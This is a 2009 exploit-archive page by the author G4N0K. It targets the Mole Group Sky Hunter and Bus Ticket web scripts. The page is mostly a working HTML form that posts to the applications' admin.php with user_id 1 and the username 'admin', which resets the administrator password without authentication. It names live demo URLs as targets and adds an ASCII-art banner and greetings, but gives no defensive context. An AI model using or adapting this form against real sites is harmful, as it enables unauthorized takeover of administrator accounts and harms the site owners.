[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Mole Group Sky Hunter/Bus Ticket Scripts Change Admin Pass Exploit
# Published : 2009-05-22
# Author : G4N0K
# Previous Title : ZaoCMS (PhpCommander) Arbitary Remote File Upload Vulnerability
# Next Title : Mole Group Restaurant Directory Script 3.0 Change Admin Pass Vuln


<html>
<head>
<!-- 
==============================================================================
                      _      _       _          _      _   _ 
                     /     | |     | |        /     | | | |
                    / _    | |     | |       / _    | |_| |
                   / ___   | |___  | |___   / ___   |  _  |
   IN THE NAME OF /_/   _ |_____| |_____| /_/   _ |_| |_|
                                                             

==============================================================================
                      ____   _  _     _   _    ___    _  __
                     / ___| | || |   |  | |  / _   | |/ /
                    | |  _  | || |_  |  | | | | | | | ' / 
                    | |_| | |__   _| | |  | | |_| | | .  
                     ____|    |_|   |_| _|  ___/  |_|_...FROM IRAN

==============================================================================
	Mole Group Sky Hunter/Bus Ticket Scripts Change Admin Pass Exploit
==============================================================================

	[??] Script:.............[ Mole Group Sky Hunter/Bus Ticket Scripts ]..
	[??] Website:............[ http://www.mole-group.com ].................
	[??] Today:..............[ 2205009 ]...................................
	[??] Founder:............[ G4N0K | mail[.]ganok[sh!t]gmail.com ].......


	
	 [+] Vulnerable Scripts
	===============================
       [0] Sky Hunter Script (demo: http://sky.mole-group.com/admin/admin.php)
       [1] Bus Ticket Script (demo: http://bus.mole-group.com/admin/admin.php)



	 [+] Greetz
	===================================
       [??] ALLAH
       [??] MSD, AMD, AFN, SMN, Str0ke...
       [??] Hussain-X, JiKo, Sakab(!)...

-->
<title>Mole Group Sky Hunter/Bus Ticket Scripts Change Admin Pass Exploit | G4N0K</title>

</head>
<body>

 <h3>::Change Password</h3>

	<table>
		<tr>
			<form method="post" action="http://sky.mole-group.com/admin/admin.php">
			<input type="hidden" name="user_id" value="1">
			<td align=right>Username:</td>
			<td align=left><input name="user_name" size="40" maxlength="40" value="admin"><td>
		</tr>
		<tr>
			<td align=right>New Password:</td><td align=left><input name="password" size="40" maxlength="40" ><td>
		</tr>
		<tr>
			<td></td><td><input type="submit" name="submit" value="Change Password"></td>
			</form>
		</tr>
	</table>
</body>
</html>

# www.Syue.com [2009-05-22]